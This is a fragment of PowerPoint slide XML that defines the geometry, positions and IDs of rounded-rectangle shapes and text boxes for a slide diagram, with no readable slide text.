                    <a:pt x="92940" y="808411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1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2536628" y="722399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40"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2450620" y="6928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1" name="object 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C51FC4C9-7F7F-CE0C-39BF-0228C948873F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40"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92940" y="6928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8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2536628" y="92940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399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2450620" y="808411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1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6928" y="722399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2" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7435A30E-7955-9BA9-A647-98D2D0A04DE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717702" y="3922524"/>
            <a:ext cx="16414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3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3" name="object 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1944DEEC-00BC-A614-F505-E8D2152C2540}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6264503" y="1247954"/>
            <a:ext cx="864235" cy="774700"/>
            <a:chOff x="6243065" y="1317497"/>
            <a:chExt cx="864235" cy="774700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="58" name="object 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C21278D0-C75E-3C02-C679-11FE64D61C72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735076" y="774191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="10142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9" name="object 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F5BFD36-1AB5-A37E-8F3D-EA0B5F08DEB3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2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735076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4" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72DB4510-F415-1AD2-A519-EEB956631518}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6404077" y="1492379"/>
            <a:ext cx="554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23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03E816F3-5CF3-2BF6-C646-5344F0D24EE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6994499" y="1247954"/>
            <a:ext cx="1056640" cy="774700"/>
            <a:chOff x="6973061" y="1317497"/>
            <a:chExt cx="1056640" cy="774700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="object 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DA0FC9F-5B75-F3BB-E012-796F1873DC09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927100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927100" y="774191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="10142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7" name="object 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48C2AB5B-9C68-94F6-D2C5-3D9B873186A9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927100" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="10142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927100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6" name="object 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9143A3C-B807-419D-DADD-5DCDBE2A0C56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7136740" y="1492379"/>
            <a:ext cx="5918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27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{663DC40F-01FF-EDA8-A0CF-BC94DCD17591}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5568035" y="2087679"/>
            <a:ext cx="864235" cy="772795"/>
            <a:chOff x="5546597" y="2157222"/>
            <a:chExt cx="864235" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54" name="object 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40B6C490-1855-516C-258A-0AA7A5AEA166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7" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826388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5" name="object 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E6BB66E-ACE2-5E9A-225F-9706B8B2C841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8" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107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8" name="object 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA418849-9691-E616-A9FA-DC662F757CFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5706339" y="2332027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31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D7233BA-BD4D-5543-37A5-B5062C78F8B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6296508" y="2087679"/>
            <a:ext cx="1754505" cy="772795"/>
            <a:chOff x="6275070" y="2157222"/>
            <a:chExt cx="1754505" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="object 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{873146A9-AED8-C958-2E4F-1659C0C68334}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6275070" y="2157222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4">
                  <a:moveTo>
                    <a:pt x="1625346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1625346" y="772667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1675471" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716404" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744003" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754124" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754124" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744003" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716404" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1675471" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625346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3" name="object 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC87FDFC-361D-72B6-74B7-9B215248029D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6275070" y="2157222"/>
              <a:ext cx="1754505" cy="772795"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1754504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1625346" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1675471" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716404" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744003" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754124" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754124" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744003" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716404" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1675471" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625346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0" name="object 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F820E93-EC72-600C-6968-D7A9D76A220F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6450940" y="2332027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35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5FD1809-CAC1-70C5-2367-6A9E3B4A1503}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4824323" y="2925879"/>
            <a:ext cx="864235" cy="772795"/>
            <a:chOff x="4802885" y="2995422"/>
            <a:chExt cx="864235" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="object 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EA082E8-BB63-FD59-A856-3E30EE24A99C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4802885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9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9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8" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826389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1" name="object 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71894C72-C401-A3C5-349F-DE9A821532CF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4802885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9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9" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108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9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2" name="object 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{021D756A-A7C3-D445-0ABF-2FF9C9F04B91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4963516" y="3170608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39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCC99232-B459-20E0-AF68-60A3BAEE133A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5554320" y="2925878"/>
            <a:ext cx="2496820" cy="772795"/>
            <a:chOff x="5532882" y="2995421"/>
            <a:chExt cx="2496820" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="object 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27621327-36D3-5ED4-4D65-F4CD2A14B842}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5532882" y="2995421"/>
              <a:ext cx="2496820" cy="772795"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2496820" h="772795">
                  <a:moveTo>
                    <a:pt x="2367534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2367534" y="772667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417659" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2458592" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2486191" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2496312" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2496312" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2486191" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2458592" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417659" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367534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9" name="object 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{561AC190-2244-86AC-D950-FAE5A0C75D9A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5532882" y="2995421"/>
              <a:ext cx="2496820" cy="772795"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2496820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2367534" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417659" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2458592" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2486191" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2496312" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2496312" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2486191" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2458592" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417659" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367534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4" name="object 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A840D3A-68E5-D7E7-4B6A-7C9548291CDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5720435" y="3170608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43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{063224A2-2ACC-085F-7D9C-6E1956105295}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4033367" y="3828086"/>
            <a:ext cx="864235" cy="774700"/>
            <a:chOff x="4011929" y="3897629"/>
            <a:chExt cx="864235" cy="774700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="object 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F73E1A03-CBAB-537A-4366-B31BE2A945ED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4011929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0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129032" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735076" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="10140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730D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7" name="object 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB67761B-7AE1-85FB-D431-C18A5077C665}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4011929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0" y="129032"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10142" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="10140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0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735076" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129032" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1290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6" name="object 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE92DA3A-00E7-559A-79EC-14B04205378B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4171416" y="4073704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7" name="object 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{637425D6-01FA-CFDD-829A-B528C4D89115}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4761839" y="3828087"/>
            <a:ext cx="3289300" cy="774700"/>
            <a:chOff x="4740401" y="3897630"/>
            <a:chExt cx="3289300" cy="774700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="object 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE8AC724-763A-CF28-0FDB-972D493070AC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4740401" y="3897630"/>
              <a:ext cx="3289300" cy="774700"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3289300" h="774700">
                  <a:moveTo>
                    <a:pt x="3159759" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="129032" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="10140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129032" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3159759" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3209978" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3250993" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3278649" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3288792" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3288792" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3278649" y="78808"/>
                  </a:lnTo>
